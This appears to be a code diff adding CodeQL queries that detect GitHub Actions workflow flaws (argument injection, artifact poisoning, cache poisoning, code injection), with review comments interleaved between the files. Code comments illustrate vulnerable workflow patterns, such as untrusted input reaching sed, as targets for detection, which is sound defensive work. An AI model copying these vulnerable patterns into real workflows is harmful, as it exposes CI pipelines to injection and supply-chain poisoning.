TFieldContent { + private string name; + + FieldContent() { this = TFieldContent(name) } + + /** Gets the name of the field. 
*/ + string getName() { result = name } + + override string toString() { result = name } +} + +predicate hasLocalFlow(Node n1, Node n2) { + n1 = n2 or + simpleLocalFlowStep(n1, n2, _) or + exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) +} + +predicate hasLocalFlowExpr(AstNode n1, AstNode n2) { + exists(Node dn1, Node dn2 | + dn1.asExpr() = n1 and + dn2.asExpr() = n2 and + hasLocalFlow(dn1, dn2) + ) +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll new file mode 100644 index 000000000000..bd9d73b41703 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -0,0 +1,24 @@ +/** + * This module provides extensible predicates for defining MaD models. + */ + +/** + * Holds if a source model exists for the given parameters. + */ +extensible predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +); + +/** + * Holds if a summary model exists for the given parameters. + */ +extensible predicate actionsSummaryModel( + string action, string version, string input, string output, string kind, string provenance +); + +/** + * Holds if a sink model exists for the given parameters. + */ +extensible predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +); diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll new file mode 100644 index 000000000000..2fd062e76607 --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll 
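Review bot: `CallNode` declares `private DataFlowCall call;` but its characteristic predicate `this.getCfgNode() instanceof DataFlowCall` never binds it and nothing reads it; either drop the field or bind it as `OutNode` in DataFlowPrivate does with `call = this.getCfgNode()`. `hasLocalFlow` and `hasLocalFlowExpr` have no QLDoc, and despite the name `hasLocalFlow` holds only for identity, one `simpleLocalFlowStep` or one `ctxFieldReadStep`, not a transitive closure; a comment such as `/** Holds if n2 is n1 or is reached from n1 by a single local flow step or a single context field read (no closure). */` would keep callers from expecting multi-step flow. `Node.toString()` and `Node.getLocation()` are `none()` rather than `abstract`, so a future `TNode` branch that forgets to override them compiles silently and prints nothing; marking them `abstract` would make the omission a compile error.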
@@ -0,0 +1,12 @@ +/** + * Provides Actions-specific definitions for use in the taint tracking library. + * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll + */ + +private import codeql.Locations +private import codeql.dataflow.TaintTracking +private import DataFlowImplSpecific + +module ActionsTaintTracking implements InputSig { + import TaintTrackingPrivate +} diff --git a/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll new file mode 100644 index 000000000000..60d5a8d7baaa --- /dev/null +++ b/actions/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll 
@@ -0,0 +1,40 @@ +/** + * Provides modules for performing local (intra-procedural) and + * global (inter-procedural) taint-tracking analyses. + */ + +private import DataFlowPrivate +private import codeql.actions.DataFlow +private import codeql.actions.dataflow.TaintSteps +private import codeql.actions.Ast + +/** + * Holds if `node` should be a sanitizer in all global taint flow configurations + * but not in local taint. + */ +predicate defaultTaintSanitizer(DataFlow::Node node) { none() } + +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } +/** + * Holds if the additional step from `nodeFrom` to `nodeTo` should be included + * in all global taint flow configurations. + */ +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" +} + +/** + * Holds if taint flow configurations should allow implicit reads of `c` at sinks + * and inputs to additional taint steps. + */ +bindingset[node] +predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() } + +/** + * Holds if the additional step from `src` to `sink` should be considered in + * speculative taint flow exploration. + */ +predicate speculativeTaintStep(DataFlow::Node src, DataFlow::Node sink) { none() } diff --git a/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll new file mode 100644 index 000000000000..0e58b1d878be --- /dev/null +++ b/actions/ql/lib/codeql/actions/ideContextual/IDEContextual.qll 
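Review bot: The commented-out two-argument `defaultAdditionalTaintStep` above the live definition is dead text; the three-argument version with `model` directly below supersedes it, so the commented lines should be deleted rather than kept as a reminder. The live predicate is the only one in this file marked `cached`; a short comment saying why (presumably because it fans out over every `AdditionalTaintStep` instance) would help a reader deciding whether `defaultTaintSanitizer` needs the same treatment once it stops being `none()`.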
@@ -0,0 +1,19 @@ +private import codeql.files.FileSystem + +/** + * Returns an appropriately encoded version of a filename `name` + * passed by the VS Code extension in order to coincide with the + * output of `.getFile()` on locatable entities. + */ +cached +File getFileBySourceArchiveName(string name) { + // The name provided for a file in the source archive by the VS Code extension + // has some differences from the absolute path in the database: + // 1. colons are replaced by underscores + // 2. there's a leading slash, even for Windows paths: "C:/foo/bar" -> + // "/C_/foo/bar" + // 3. double slashes in UNC prefixes are replaced with a single slash + // We can handle 2 and 3 together by unconditionally adding a leading slash + // before replacing double slashes. + name = ("/" + result.getAbsolutePath().replaceAll(":", "_")).replaceAll("//", "/") +} diff --git a/actions/ql/lib/codeql/actions/ideContextual/printAst.qll b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll new file mode 100644 index 000000000000..f8a7c16f0712 --- /dev/null +++ b/actions/ql/lib/codeql/actions/ideContextual/printAst.qll 
@@ -0,0 +1,137 @@
+/**
+ * Provides queries to pretty-print an Kaleidoscope abstract syntax tree as a graph.
+ *
+ * By default, this will print the AST for all nodes in the database. To change
+ * this behavior, extend `PrintASTConfiguration` and override `shouldPrintNode`
+ * to hold for only the AST nodes you wish to view.
+ */
+
+private import codeql.actions.Ast
+private import codeql.Locations
+
+/**
+ * The query can extend this class to control which nodes are printed.
+ */
+class PrintAstConfiguration extends string {
+ PrintAstConfiguration() { this = "PrintAstConfiguration" }
+
+ /**
+ * Holds if the given node should be printed.
+ */
+ predicate shouldPrintNode(PrintAstNode n) { any() }
+}
+
+newtype TPrintNode = TPrintRegularAstNode(AstNode n) { any() }
+
+private predicate shouldPrintNode(PrintAstNode n) {
+ any(PrintAstConfiguration config).shouldPrintNode(n)
+}
+
+/**
+ * A node in the output tree.
+ */
+class PrintAstNode extends TPrintNode {
+ /** Gets a textual representation of this node in the PrintAst output tree. */
+ string toString() { none() }
+
+ /**
+ * Gets the child node with name `edgeName`. Typically this is the name of the
+ * predicate used to access the child.
+ */
+ PrintAstNode getChild(string edgeName) { none() }
+
+ /** Get the Location of this AST node */
+ Location getLocation() { none() }
+
+ /** Gets a child of this node. */
+ final PrintAstNode getAChild() { result = this.getChild(_) }
+
+ /** Gets the parent of this node, if any. */
+ final PrintAstNode getParent() { result.getAChild() = this }
+
+ /** Gets a value used to order this node amongst its siblings. */
+ int getOrder() {
+ this =
+ rank[result](PrintRegularAstNode p, Location l, File f |
+ l = p.getLocation() and
+ f = l.getFile()
+ |
+ p
+ order by
+ f.getBaseName(), f.getAbsolutePath(), l.getStartLine(), l.getStartColumn(),
+ l.getEndLine(), l.getEndColumn()
+ )
+ }
+
+ /**
+ * Gets the value of the property of this node, where the name of the property
+ * is `key`.
+ */
+ final string getProperty(string key) {
+ key = "semmle.label" and
+ result = this.toString()
+ or
+ key = "semmle.order" and result = this.getOrder().toString()
+ }
+}
+
+/** An `AstNode` in the output tree. */
+class PrintRegularAstNode extends PrintAstNode, TPrintRegularAstNode {
+ AstNode astNode;
+
+ PrintRegularAstNode() { this = TPrintRegularAstNode(astNode) }
+
+ override string toString() {
+ result = "[" + concat(astNode.getAPrimaryQlClass(), ", ") + "] " + astNode.toString()
+ }
+
+ override Location getLocation() { result = astNode.getLocation() }
+
+ override PrintAstNode getChild(string name) {
+ exists(int i |
+ name = i.toString() and
+ result =
+ TPrintRegularAstNode(rank[i](AstNode child, Location l |
+ child.getParentNode() = astNode and
+ child.getLocation() = l
+ |
+ child
+ order by
+ l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(),
+ child.toString()
+ ))
+ )
+ }
+}
+
+/**
+ * Holds if `node` belongs to the output tree, and its property `key` has the
+ * given `value`.
+ */
+query predicate nodes(PrintAstNode node, string key, string value) {
+ value = node.getProperty(key) and shouldPrintNode(node)
+}
+
+/**
+ * Holds if `target` is a child of `source` in the AST, and property `key` of
+ * the edge has the given `value`.
+ */
+query predicate edges(PrintAstNode source, PrintAstNode target, string key, string value) {
+ shouldPrintNode(source) and
+ shouldPrintNode(target) and
+ target = source.getChild(_) and
+ (
+ key = "semmle.label" and
+ value = strictconcat(string name | source.getChild(name) = target | name, "/")
+ or
+ key = "semmle.order" and
+ value = target.getProperty("semmle.order")
+ )
+}
+
+/**
+ * Holds if property `key` of the graph has the given `value`.
+ */
+query predicate graphProperties(string key, string value) {
+ key = "semmle.graphKind" and value = "tree"
+}
diff --git a/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
new file mode 100644
index 000000000000..1d461cca3df2
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll
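Review bot: The module QLDoc says the file pretty-prints "an Kaleidoscope abstract syntax tree", which is left over from whichever pack this was copied from and is also ungrammatical; it should read ` * Provides queries to pretty-print a GitHub Actions abstract syntax tree as a graph.`. The same docstring tells readers to extend `PrintASTConfiguration`, but the class declared below is `PrintAstConfiguration`. `/** Get the Location of this AST node */` on `PrintAstNode.getLocation` should also follow the "Gets ..." form used by its neighbours, e.g. `/** Gets the location of this AST node. */`.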
@@ -0,0 +1,94 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+abstract class ArgumentInjectionSink extends DataFlow::Node {
+ abstract string getCommand();
+}
+
+/**
+ * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection.
+ * e.g.
+ * env:
+ * BODY: ${{ github.event.comment.body }}
+ * run: |
+ * sed "s/FOO/$BODY/g" > /tmp/foo
+ */
+class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink {
+ string command;
+ string argument;
+
+ ArgumentInjectionFromEnvVarSink() {
+ exists(Run run, string var |
+ run.getScript() = this.asExpr() and
+ (
+ exists(run.getInScopeEnvVarExpr(var)) or
+ var = "GITHUB_HEAD_REF"
+ ) and
+ run.getScript().getAnEnvReachingArgumentInjectionSink(var, command, argument)
+ )
+ }
+
+ override string getCommand() { result = command }
+}
+
+/**
+ * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument
+ * e.g.
+ * run: |
+ * BODY=$(git log --format=%s)
+ * sed "s/FOO/$BODY/g" > /tmp/foo
+ */
+class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink {
+ string command;
+ string argument;
+
+ ArgumentInjectionFromCommandSink() {
+ exists(CommandSource source, Run run |
+ run = source.getEnclosingRun() and
+ this.asExpr() = run.getScript() and
+ run.getScript().getACmdReachingArgumentInjectionSink(source.getCommand(), command, argument)
+ )
+ }
+
+ override string getCommand() { result = command }
+}
+
+/**
+ * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection.
+ */
+class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink {
+ ArgumentInjectionFromMaDSink() { madSink(this, "argument-injection") }
+
+ override string getCommand() { result = "unknown" }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a code script.
+ */
+private module ArgumentInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) {
+ source instanceof RemoteFlowSource
+ or
+ exists(Run run |
+ run.getScript() = source.asExpr() and
+ run.getScript().getAnEnvReachingArgumentInjectionSink("GITHUB_HEAD_REF", _, _)
+ )
+ }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink }
+
+ predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(Run run, string var |
+ run.getInScopeEnvVarExpr(var) = pred.asExpr() and
+ succ.asExpr() = run.getScript() and
+ run.getScript().getAnEnvReachingArgumentInjectionSink(var, _, _)
+ )
+ }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */
+module ArgumentInjectionFlow = TaintTracking::Global;
diff --git a/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
new file mode 100644
index 000000000000..d8d5f83c867d
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll
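Review bot: The QLDoc on `ArgumentInjectionFromMaDSink` is a copy of the env-var sink's ("Holds if a Run step declares an environment variable ...") and describes the wrong class; something like `/** An argument-injection sink declared through models-as-data. */` fits what the characteristic predicate does. The docs on `ArgumentInjectionConfig` and `ArgumentInjectionFlow` are likewise carried over from the code-injection query and talk about "construct and evaluate a code script" although this file is about command arguments. Separately, `ArgumentInjectionFromEnvVarSink` and `ArgumentInjectionFromCommandSink` both bind an `argument` field that nothing exposes; either add `abstract string getArgument();` to `ArgumentInjectionSink` (with `override string getArgument() { result = "unknown" }` in the MaD sink, mirroring `getCommand`) so queries can report the injected argument, or drop the field.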
@@ -0,0 +1,322 @@
+import actions
+private import codeql.actions.TaintTracking
+import codeql.actions.DataFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.security.PoisonableSteps
+import codeql.actions.security.UntrustedCheckoutQuery
+
+string unzipRegexp() { result = "(unzip|tar)\\s+.*" }
+
+string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" }
+
+abstract class UntrustedArtifactDownloadStep extends Step {
+ abstract string getPath();
+}
+
+class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep {
+ GitHubDownloadArtifactActionStep() {
+ this.getCallee() = "actions/download-artifact" and
+ (
+ // By default, the permissions are scoped so they can only download Artifacts within the current workflow run.
+ // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers
+ this.getArgument("run-id").matches("%github.event.workflow_run.id%") and
+ exists(this.getArgument("github-token"))
+ or
+ // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step
+ exists(LocalJob job, SimplePRHeadCheckoutStep checkout, UsesStep upload |
+ this.getEnclosingWorkflow().getAJob() = job and
+ job.getAStep() = checkout and
+ checkout.getATriggerEvent().getName() = "pull_request_target" and
+ checkout.getAFollowingStep() = upload and
+ upload.getCallee() = "actions/upload-artifact"
+ )
+ )
+ }
+
+ override string getPath() {
+ if exists(this.getArgument("path"))
+ then result = normalizePath(this.getArgument("path"))
+ else result = "GITHUB_WORKSPACE/"
+ }
+}
+
+class DownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep {
+ DownloadArtifactActionStep() {
+ this.getCallee() =
+ [
+ "dawidd6/action-download-artifact", "marcofaggian/action-download-multiple-artifacts",
+ "benday-inc/download-latest-artifact", "blablacar/action-download-last-artifact",
+ "levonet/action-download-last-artifact", "bettermarks/action-artifact-download",
+ "aochmann/actions-download-artifact", "cytopia/download-artifact-retry-action",
+ "alextompkins/download-prior-artifact", "nmerget/download-gzip-artifact",
+ "benday-inc/download-artifact", "synergy-au/download-workflow-artifacts-action",
+ "ishworkh/docker-image-artifact-download", "ishworkh/container-image-artifact-download",
+ "sidx1024/action-download-artifact", "hyperskill/azblob-download-artifact",
+ "ma-ve/action-download-artifact-with-retry"
+ ] and
+ (
+ not exists(this.getArgument(["branch", "branch_name"]))
+ or
+ exists(this.getArgument(["branch", "branch_name"])) and
+ this.getArgument("allow_forks") = "true"
+ ) and
+ (
+ not exists(this.getArgument(["commit", "commitHash", "commit_sha"])) or
+ not this.getArgument(["commit", "commitHash", "commit_sha"])
+ .matches("%github.event.pull_request.head.sha%")
+ ) and
+ (
+ not exists(this.getArgument("event")) or
+ not this.getArgument("event") = "pull_request"
+ ) and
+ (
+ not exists(this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])) or
+ this.getArgument(["run-id", "run_id", "workflow-run-id", "workflow_run_id"])
+ .matches("%github.event.workflow_run.id%")
+ ) and
+ (
+ not exists(this.getArgument("pr")) or
+ not this.getArgument("pr")
+ .matches(["%github.event.pull_request.number%", "%github.event.number%"])
+ )
+ }
+
+ override string getPath() {
+ if exists(this.getArgument(["path", "download_path"]))
+ then result = normalizePath(this.getArgument(["path", "download_path"]))
+ else
+ if exists(this.getArgument("paths"))
+ then result = normalizePath(this.getArgument("paths").splitAt(" "))
+ else result = "GITHUB_WORKSPACE/"
+ }
+}
+
+class LegitLabsDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep {
+ LegitLabsDownloadArtifactActionStep() {
+ this.getCallee() = "Legit-Labs/action-download-artifact" and
+ (
+ not exists(this.getArgument("branch")) or
+ not this.getArgument("branch") = ["main", "master"]
+ ) and
+ (
+ not exists(this.getArgument("commit")) or
+ not this.getArgument("commit").matches("%github.event.pull_request.head.sha%")
+ ) and
+ (
+ not exists(this.getArgument("event")) or
+ not this.getArgument("event") = "pull_request"
+ ) and
+ (
+ not exists(this.getArgument("run_id")) or
+ not this.getArgument("run_id").matches("%github.event.workflow_run.id%")
+ ) and
+ (
+ not exists(this.getArgument("pr")) or
+ not this.getArgument("pr").matches("%github.event.pull_request.number%")
+ )
+ }
+
+ override string getPath() {
+ if exists(this.getArgument("path"))
+ then result = normalizePath(this.getArgument("path"))
+ else result = "GITHUB_WORKSPACE/artifacts"
+ }
+}
+
+class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, UsesStep {
+ string script;
+
+ ActionsGitHubScriptDownloadStep() {
+ // eg:
+ // - uses: actions/github-script@v6
+ // with:
+ // script: |
+ // let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ // owner: context.repo.owner,
+ // repo: context.repo.repo,
+ // run_id: context.payload.workflow_run.id,
+ // });
+ // let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => {
+ // return artifact.name == ""
+ // })[0];
+ // let download = await github.rest.actions.downloadArtifact({
+ // owner: context.repo.owner,
+ // repo: context.repo.repo,
+ // artifact_id: matchArtifact.id,
+ // archive_format: 'zip',
+ // });
+ // var fs = require('fs');
+ // fs.writeFileSync('${{github.workspace}}/test-results.zip', Buffer.from(download.data));
+ this.getCallee() = "actions/github-script" and
+ this.getArgument("script") = script and
+ script.matches("%listWorkflowRunArtifacts(%") and
+ script.matches("%downloadArtifact(%") and
+ script.matches("%writeFileSync(%") and
+ // Filter out artifacts that were created by pull-request.
+ not script.matches("%exclude_pull_requests: true%")
+ }
+
+ override string getPath() {
+ if
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result =
+ normalizePath(trimQuotes(this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3)))
+ else
+ if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp())
+ then result = "GITHUB_WORKSPACE/"
+ else none()
+ }
+}
+
+class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run {
+ GHRunArtifactDownloadStep() {
+ // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name"
+ this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and
+ (
+ this.getScript().getACommand().regexpMatch(unzipRegexp()) or
+ this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp())
+ )
+ }
+
+ override string getPath() {
+ if
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or
+ this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result =
+ normalizePath(trimQuotes(this.getScript()
+ .getACommand()
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or
+ result =
+ normalizePath(trimQuotes(this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3)))
+ else
+ if
+ this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or
+ this.getScript().getACommand().regexpMatch(unzipRegexp())
+ then result = "GITHUB_WORKSPACE/"
+ else none()
+ }
+}
+
+class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run {
+ DirectArtifactDownloadStep() {
+ // eg:
+ // run: |
+ // artifacts_url=${{ github.event.workflow_run.artifacts_url }}
+ // gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact
+ // do
+ // IFS=$'\t' read name url <<< "$artifact"
+ // gh api $url > "$name.zip"
+ // unzip -d "$name" "$name.zip"
+ // done
+ this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and
+ (
+ this.getScript().getACommand().regexpMatch(unzipRegexp()) or
+ this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp())
+ )
+ }
+
+ override string getPath() {
+ if
+ this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or
+ this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpMatch(unzipRegexp() + unzipDirArgRegexp())
+ then
+ result =
+ normalizePath(trimQuotes(this.getScript()
+ .getACommand()
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or
+ result =
+ normalizePath(trimQuotes(this.getAFollowingStep()
+ .(Run)
+ .getScript()
+ .getACommand()
+ .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3)))
+ else result = "GITHUB_WORKSPACE/"
+ }
+}
+
+class ArtifactPoisoningSink extends DataFlow::Node {
+ UntrustedArtifactDownloadStep download;
+ PoisonableStep poisonable;
+
+ ArtifactPoisoningSink() {
+ download.getAFollowingStep() = poisonable and
+ // excluding artifacts downloaded to /tmp
+ not download.getPath().regexpMatch("^/tmp.*") and
+ (
+ poisonable.(Run).getScript() = this.asExpr() and
+ (
+ // Check if the poisonable step is a local script execution step
+ // and the path of the command or script matches the path of the downloaded artifact
+ isSubpath(poisonable.(LocalScriptExecutionRunStep).getPath(), download.getPath())
+ or
+ // Checking the path for non local script execution steps is very difficult
+ not poisonable instanceof LocalScriptExecutionRunStep
+ // Its not easy to extract the path from a non-local script execution step so skipping this check for now
+ // and isSubpath(poisonable.(Run).getWorkingDirectory(), download.getPath())
+ )
+ or
+ poisonable.(UsesStep) = this.asExpr() and
+ (
+ not poisonable instanceof LocalActionUsesStep and
+ download.getPath() = "GITHUB_WORKSPACE/"
+ or
+ isSubpath(poisonable.(LocalActionUsesStep).getPath(), download.getPath())
+ )
+ )
+ }
+
+ string getPath() { result = download.getPath() }
+}
+
+/**
+ * A taint-tracking configuration for unsafe artifacts
+ * that is used may lead to artifact poisoning
+ */
+private module ArtifactPoisoningConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink }
+
+ predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(PoisonableStep step |
+ pred instanceof ArtifactSource and
+ pred.asExpr().(Step).getAFollowingStep() = step and
+ (
+ succ.asExpr() = step.(Run).getScript() or
+ succ.asExpr() = step.(UsesStep)
+ )
+ )
+ or
+ exists(Run run |
+ pred instanceof ArtifactSource and
+ pred.asExpr().(Step).getAFollowingStep() = run and
+ succ.asExpr() = run.getScript() and
+ exists(run.getScript().getAFileReadCommand())
+ )
+ }
+}
+
+/** Tracks flow of unsafe artifacts that is used in an insecure way. */
+module ArtifactPoisoningFlow = TaintTracking::Global;
diff --git a/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
new file mode 100644
index 000000000000..e5c5a3655101
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/CachePoisoningQuery.qll
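Review bot: The `/tmp` exclusion in `ArtifactPoisoningSink`, `not download.getPath().regexpMatch("^/tmp.*")`, also drops any download whose path merely starts with the characters `/tmp` (a `/tmp-artifacts/` directory under the workspace, say), and since `regexpMatch` must match the whole string the `^` is redundant; `not download.getPath().regexpMatch("/tmp(/.*)?")` says what the comment intends, assuming `normalizePath` (defined outside this hunk) keeps a leading `/tmp` intact. The literal `"GITHUB_WORKSPACE/"` is spelled out as the default download location in five `getPath()` overrides and once more in the sink's `download.getPath() = "GITHUB_WORKSPACE/"` comparison; a helper in the style of `unzipRegexp()`, e.g. `string workspacePath() { result = "GITHUB_WORKSPACE/" }`, would keep those from drifting apart. `unzipRegexp`, `unzipDirArgRegexp`, `UntrustedArtifactDownloadStep` and each download-step class are public but carry no QLDoc, which the qldoc-coverage exception added to the workflow in this same change will hide.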
@@ -0,0 +1,72 @@
+import actions
+
+string defaultBranchTriggerEvent() {
+ result =
+ [
+ "check_run", "check_suite", "delete", "discussion", "discussion_comment", "fork", "gollum",
+ "issue_comment", "issues", "label", "milestone", "project", "project_card", "project_column",
+ "public", "pull_request_comment", "pull_request_target", "repository_dispatch", "schedule",
+ "watch", "workflow_run"
+ ]
+}
+
+predicate runsOnDefaultBranch(Event e) {
+ (
+ e.getName() = defaultBranchTriggerEvent() and
+ not e.getName() = "pull_request_target"
+ or
+ e.getName() = "push" and
+ e.getAPropertyValue("branches") = defaultBranchNames()
+ or
+ e.getName() = "pull_request_target" and
+ (
+ // no filtering
+ not e.hasProperty("branches") and not e.hasProperty("branches-ignore")
+ or
+ // only branches-ignore filter
+ e.hasProperty("branches-ignore") and
+ not e.hasProperty("branches") and
+ not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
+ or
+ // only branches filter
+ e.hasProperty("branches") and
+ not e.hasProperty("branches-ignore") and
+ e.getAPropertyValue("branches") = defaultBranchNames()
+ or
+ // branches and branches-ignore filters
+ e.hasProperty("branches") and
+ e.hasProperty("branches-ignore") and
+ e.getAPropertyValue("branches") = defaultBranchNames() and
+ not e.getAPropertyValue("branches-ignore") = defaultBranchNames()
+ )
+ )
+}
+
+abstract class CacheWritingStep extends Step {
+ abstract string getPath();
+}
+
+class CacheActionUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionUsesStep() { this.getCallee() = "actions/cache" }
+
+ override string getPath() {
+ result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n"))
+ }
+}
+
+class CacheActionSaveUsesStep extends CacheWritingStep, UsesStep {
+ CacheActionSaveUsesStep() { this.getCallee() = "actions/cache/save" }
+
+ override string getPath() {
+ result = normalizePath(this.(UsesStep).getArgument("path").splitAt("\n"))
+ }
+}
+
+class SetupRubyUsesStep extends CacheWritingStep, UsesStep {
+ SetupRubyUsesStep() {
+ this.getCallee() = ["actions/setup-ruby", "ruby/setup-ruby"] and
+ this.getArgument("bundler-cache") = "true"
+ }
+
+ override string getPath() { result = normalizePath("vendor/bundle") }
+}
diff --git a/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
new file mode 100644
index 000000000000..fac498f72dab
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/security/CodeInjectionQuery.qll
@@ -0,0 +1,41 @@
+private import actions
+private import codeql.actions.TaintTracking
+private import codeql.actions.dataflow.ExternalFlow
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.DataFlow
+
+class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() {
+ exists(Run e | e.getAnScriptExpr() = this.asExpr()) or
+ madSink(this, "code-injection")
+ }
+}
+
+/**
+ * A taint-tracking configuration for unsafe user input
+ * that is used to construct and evaluate a code script.
+ */
+private module CodeInjectionConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+
+ predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) {
+ exists(Uses step |
+ pred instanceof FileSource and
+ pred.asExpr().(Step).getAFollowingStep() = step and
+ succ.asExpr() = step and
+ madSink(succ, "code-injection")
+ )
+ or
+ exists(Run run |
+ pred instanceof FileSource and
+ pred.asExpr().(Step).getAFollowingStep() = run and
+ succ.asExpr() = run.getScript() and
+ exists(run.getScript().getAFileReadCommand())
+ )
+ }
+}
+
+/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */
+module CodeInjectionFlow = TaintTracking::Global;
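Review bot: `runsOnDefaultBranch` compares the `branches` and `branches-ignore` values against `defaultBranchNames()` by plain string equality, so a `push` filter written as a glob (`main*`, `release/**`, `'**'`) is never recognised as covering the default branch and such workflows fall out of the cache-poisoning check entirely; `defaultBranchNames()` is defined outside this hunk, so how much this matters depends on what it returns, but a glob-aware comparison or at least a comment noting the limitation is warranted. `defaultBranchTriggerEvent()` also lists `pull_request_comment`, which as far as I know is not a GitHub Actions trigger name (`pull_request_review_comment` is), so that entry can never match an `Event`. In `CacheActionUsesStep.getPath` and `CacheActionSaveUsesStep.getPath` the `this.(UsesStep)` cast is redundant, as both classes already extend `UsesStep`.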
